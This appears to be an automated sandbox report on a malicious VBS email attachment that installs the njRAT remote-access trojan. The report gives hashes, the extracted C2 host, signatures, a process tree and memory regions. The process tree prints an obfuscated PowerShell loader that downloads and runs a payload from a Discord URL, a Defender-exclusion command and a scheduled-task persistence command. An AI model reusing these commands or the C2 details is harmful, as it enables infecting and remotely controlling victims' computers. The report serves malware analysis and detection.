Analysis
-
max time kernel
147s -
max time network
145s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
29-10-2021 18:41
Static task
static1
Behavioral task
behavioral1
Sample
Shipment#45523666245.vbs
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
Shipment#45523666245.vbs
Resource
win10-en-20210920
General
-
Target
Shipment#45523666245.vbs
-
Size
15KB
-
MD5
b671f9ee1edb1e6f2911c22c4e6ebbaf
-
SHA1
6de6dfee5b87a8f52ce34bc0c9d147bc69faa04e
-
SHA256
313bb9d87b5bbdc4cc164ee429b41bcac1605401e1c3e7fa8d1fa287277e3cce
-
SHA512
15f4ed29c203cf9a2da50b5df6d898e79feb08cf9ddc0ab7c315eeab9038745743e5352dc2db5197c3bf3817d26590bf4adc21a91a68fd2dcd633e3712fa4832
Malware Config
Extracted
njrat
v2.0
------(MEILLLER)------
new.libya2020.com.ly:2020
Windows
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 9 3656 powershell.exe -
Executes dropped EXE 3 IoCs
Processes:
update.exeupdate.exeupdate.exepid process 1628 update.exe 1572 update.exe 3740 update.exe -
Drops startup file 1 IoCs
Processes:
update.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk update.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
update.exedescription pid process target process PID 1628 set thread context of 1572 1628 update.exe update.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 3656 powershell.exe 3656 powershell.exe 3656 powershell.exe 3736 powershell.exe 3736 powershell.exe 3736 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3656 powershell.exe Token: SeIncreaseQuotaPrivilege 3656 powershell.exe Token: SeSecurityPrivilege 3656 powershell.exe Token: SeTakeOwnershipPrivilege 3656 powershell.exe Token: SeLoadDriverPrivilege 3656 powershell.exe Token: SeSystemProfilePrivilege 3656 powershell.exe Token: SeSystemtimePrivilege 3656 powershell.exe Token: SeProfSingleProcessPrivilege 3656 powershell.exe Token: SeIncBasePriorityPrivilege 3656 powershell.exe Token: SeCreatePagefilePrivilege 3656 powershell.exe Token: SeBackupPrivilege 3656 powershell.exe Token: SeRestorePrivilege 3656 powershell.exe Token: SeShutdownPrivilege 3656 powershell.exe Token: SeDebugPrivilege 3656 powershell.exe Token: SeSystemEnvironmentPrivilege 3656 powershell.exe Token: SeRemoteShutdownPrivilege 3656 powershell.exe Token: SeUndockPrivilege 3656 powershell.exe Token: SeManageVolumePrivilege 3656 powershell.exe Token: 33 3656 powershell.exe Token: 34 3656 powershell.exe Token: 35 3656 powershell.exe Token: 36 3656 powershell.exe Token: SeIncreaseQuotaPrivilege 3656 powershell.exe Token: SeSecurityPrivilege 3656 powershell.exe Token: SeTakeOwnershipPrivilege 3656 powershell.exe Token: SeLoadDriverPrivilege 3656 powershell.exe Token: SeSystemProfilePrivilege 3656 powershell.exe Token: SeSystemtimePrivilege 3656 powershell.exe Token: SeProfSingleProcessPrivilege 3656 powershell.exe Token: SeIncBasePriorityPrivilege 3656 powershell.exe Token: SeCreatePagefilePrivilege 3656 powershell.exe Token: SeBackupPrivilege 3656 powershell.exe Token: SeRestorePrivilege 3656 powershell.exe Token: SeShutdownPrivilege 3656 powershell.exe Token: SeDebugPrivilege 3656 powershell.exe Token: SeSystemEnvironmentPrivilege 3656 powershell.exe Token: SeRemoteShutdownPrivilege 3656 powershell.exe Token: SeUndockPrivilege 3656 powershell.exe Token: SeManageVolumePrivilege 3656 powershell.exe Token: 33 3656 powershell.exe Token: 34 3656 powershell.exe Token: 35 3656 powershell.exe Token: 36 3656 powershell.exe Token: SeIncreaseQuotaPrivilege 3656 powershell.exe Token: SeSecurityPrivilege 3656 powershell.exe Token: SeTakeOwnershipPrivilege 3656 powershell.exe Token: SeLoadDriverPrivilege 3656 powershell.exe Token: SeSystemProfilePrivilege 3656 powershell.exe Token: SeSystemtimePrivilege 3656 powershell.exe Token: SeProfSingleProcessPrivilege 3656 powershell.exe Token: SeIncBasePriorityPrivilege 3656 powershell.exe Token: SeCreatePagefilePrivilege 3656 powershell.exe Token: SeBackupPrivilege 3656 powershell.exe Token: SeRestorePrivilege 3656 powershell.exe Token: SeShutdownPrivilege 3656 powershell.exe Token: SeDebugPrivilege 3656 powershell.exe Token: SeSystemEnvironmentPrivilege 3656 powershell.exe Token: SeRemoteShutdownPrivilege 3656 powershell.exe Token: SeUndockPrivilege 3656 powershell.exe Token: SeManageVolumePrivilege 3656 powershell.exe Token: 33 3656 powershell.exe Token: 34 3656 powershell.exe Token: 35 3656 powershell.exe Token: 36 3656 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
WScript.exepowershell.exeupdate.exedescription pid process target process PID 3364 wrote to memory of 3656 3364 WScript.exe powershell.exe PID 3364 wrote to memory of 3656 3364 WScript.exe powershell.exe PID 3656 wrote to memory of 1628 3656 powershell.exe update.exe PID 3656 wrote to memory of 1628 3656 powershell.exe update.exe PID 3656 wrote to memory of 1628 3656 powershell.exe update.exe PID 1628 wrote to memory of 3736 1628 update.exe powershell.exe PID 1628 wrote to memory of 3736 1628 update.exe powershell.exe PID 1628 wrote to memory of 3736 1628 update.exe powershell.exe PID 1628 wrote to memory of 2952 1628 update.exe schtasks.exe PID 1628 wrote to memory of 2952 1628 update.exe schtasks.exe PID 1628 wrote to memory of 2952 1628 update.exe schtasks.exe PID 1628 wrote to memory of 1572 1628 update.exe update.exe PID 1628 wrote to memory of 1572 1628 update.exe update.exe PID 1628 wrote to memory of 1572 1628 update.exe update.exe PID 1628 wrote to memory of 1572 1628 update.exe update.exe PID 1628 wrote to memory of 1572 1628 update.exe update.exe PID 1628 wrote to memory of 1572 1628 update.exe update.exe PID 1628 wrote to memory of 1572 1628 update.exe update.exe PID 1628 wrote to memory of 1572 1628 update.exe update.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipment#45523666245.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`uprWjOFkvkmXBfdt`.W`e'.Replace('uprWjOFkvkmXBfd','w-Object Ne');$alosh='bCxNDFdlAckIUgChpnlo'.Replace('xNDFdlAckIUgChp','lient).Dow'); $Dont='adString(''https://cdn.discordapp.com/attachments/903219380505169933/903220062633209916/UPS.jpg'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\update.exe"C:\Users\Public\update.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\update.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrAhvaHxqGKf" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA46A.tmp"4⤵
- Creates scheduled task(s)
-
C:\Users\Public\update.exe"C:\Users\Public\update.exe"4⤵
- Executes dropped EXE
- Drops startup file
-
C:\Users\Public\update.exeC:\Users\Public\update.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\update.exe.logMD5
0c2899d7c6746f42d5bbe088c777f94c
SHA1622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA2565b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
b46561c25ef0fb853958cb1743a44dee
SHA13d2a202ad3e49fd6056885d629baa1207c54aa73
SHA256bcac29045f0b0395f1696aaa9538667d996592b710a59767c0a00ccd8e3c4c12
SHA5127ccc85ffd91d8c7b1f48443cb9c31c185c538dca7c62786d55939e7128db0543d234c97d2077428bb106cf37e0248bec9a405abff7fcebdde74c7dabbaaad80d
-
C:\Users\Public\update.exeMD5
7059d3f5185128394432baaaa44ee4ea
SHA1462dbc0838cb721cfb99ce505a30b0c32237e5ba
SHA256cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a
SHA512d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5
-
C:\Users\Public\update.exeMD5
7059d3f5185128394432baaaa44ee4ea
SHA1462dbc0838cb721cfb99ce505a30b0c32237e5ba
SHA256cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a
SHA512d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5
-
C:\Users\Public\update.exeMD5
7059d3f5185128394432baaaa44ee4ea
SHA1462dbc0838cb721cfb99ce505a30b0c32237e5ba
SHA256cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a
SHA512d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5
-
C:\Users\Public\update.exeMD5
7059d3f5185128394432baaaa44ee4ea
SHA1462dbc0838cb721cfb99ce505a30b0c32237e5ba
SHA256cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a
SHA512d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5
-
memory/1572-431-0x0000000005D00000-0x0000000005D01000-memory.dmpFilesize
4KB
-
memory/1572-176-0x00000000004083AE-mapping.dmp
-
memory/1572-174-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1628-168-0x0000000007C60000-0x000000000815E000-memory.dmpFilesize
5.0MB
-
memory/1628-170-0x0000000009900000-0x0000000009901000-memory.dmpFilesize
4KB
-
memory/1628-169-0x0000000008100000-0x0000000008106000-memory.dmpFilesize
24KB
-
memory/1628-171-0x0000000009890000-0x00000000098B8000-memory.dmpFilesize
160KB
-
memory/1628-167-0x0000000007EC0000-0x0000000007EC1000-memory.dmpFilesize
4KB
-
memory/1628-166-0x0000000007D40000-0x0000000007D41000-memory.dmpFilesize
4KB
-
memory/1628-165-0x0000000008160000-0x0000000008161000-memory.dmpFilesize
4KB
-
memory/1628-163-0x0000000000EA0000-0x0000000000EA1000-memory.dmpFilesize
4KB
-
memory/1628-159-0x0000000000000000-mapping.dmp
-
memory/2952-173-0x0000000000000000-mapping.dmp
-
memory/3656-128-0x0000019142040000-0x0000019142041000-memory.dmpFilesize
4KB
-
memory/3656-119-0x0000019125FB0000-0x0000019125FB2000-memory.dmpFilesize
8KB
-
memory/3656-150-0x0000019140068000-0x000001914006A000-memory.dmpFilesize
8KB
-
memory/3656-133-0x0000019140066000-0x0000019140068000-memory.dmpFilesize
8KB
-
memory/3656-129-0x0000019125FB0000-0x0000019125FB2000-memory.dmpFilesize
8KB
-
memory/3656-115-0x0000000000000000-mapping.dmp
-
memory/3656-127-0x0000019125FB0000-0x0000019125FB2000-memory.dmpFilesize
8KB
-
memory/3656-126-0x0000019125FB0000-0x0000019125FB2000-memory.dmpFilesize
8KB
-
memory/3656-125-0x0000019125FB0000-0x0000019125FB2000-memory.dmpFilesize
8KB
-
memory/3656-124-0x0000019125FB0000-0x0000019125FB2000-memory.dmpFilesize
8KB
-
memory/3656-116-0x0000019125FB0000-0x0000019125FB2000-memory.dmpFilesize
8KB
-
memory/3656-123-0x0000019140063000-0x0000019140065000-memory.dmpFilesize
8KB
-
memory/3656-122-0x0000019140060000-0x0000019140062000-memory.dmpFilesize
8KB
-
memory/3656-117-0x0000019125FB0000-0x0000019125FB2000-memory.dmpFilesize
8KB
-
memory/3656-121-0x000001913FEB0000-0x000001913FEB1000-memory.dmpFilesize
4KB
-
memory/3656-120-0x0000019125FB0000-0x0000019125FB2000-memory.dmpFilesize
8KB
-
memory/3656-118-0x0000019125FB0000-0x0000019125FB2000-memory.dmpFilesize
8KB
-
memory/3656-161-0x0000019125FB0000-0x0000019125FB2000-memory.dmpFilesize
8KB
-
memory/3736-192-0x0000000008360000-0x0000000008361000-memory.dmpFilesize
4KB
-
memory/3736-188-0x00000000080D0000-0x00000000080D1000-memory.dmpFilesize
4KB
-
memory/3736-181-0x0000000007A00000-0x0000000007A01000-memory.dmpFilesize
4KB
-
memory/3736-185-0x0000000008030000-0x0000000008031000-memory.dmpFilesize
4KB
-
memory/3736-193-0x00000000089D0000-0x00000000089D1000-memory.dmpFilesize
4KB
-
memory/3736-189-0x0000000008390000-0x0000000008391000-memory.dmpFilesize
4KB
-
memory/3736-190-0x00000000084A0000-0x00000000084A1000-memory.dmpFilesize
4KB
-
memory/3736-194-0x0000000008B00000-0x0000000008B01000-memory.dmpFilesize
4KB
-
memory/3736-186-0x00000000073C2000-0x00000000073C3000-memory.dmpFilesize
4KB
-
memory/3736-184-0x00000000073C0000-0x00000000073C1000-memory.dmpFilesize
4KB
-
memory/3736-179-0x0000000004FA0000-0x0000000004FA1000-memory.dmpFilesize
4KB
-
memory/3736-230-0x000000007F740000-0x000000007F741000-memory.dmpFilesize
4KB
-
memory/3736-231-0x00000000073C3000-0x00000000073C4000-memory.dmpFilesize
4KB
-
memory/3736-177-0x0000000004E00000-0x0000000004E01000-memory.dmpFilesize
4KB
-
memory/3736-175-0x0000000004E00000-0x0000000004E01000-memory.dmpFilesize
4KB
-
memory/3736-172-0x0000000000000000-mapping.dmp
-
memory/3740-442-0x0000000007B90000-0x000000000808E000-memory.dmpFilesize
5.0MB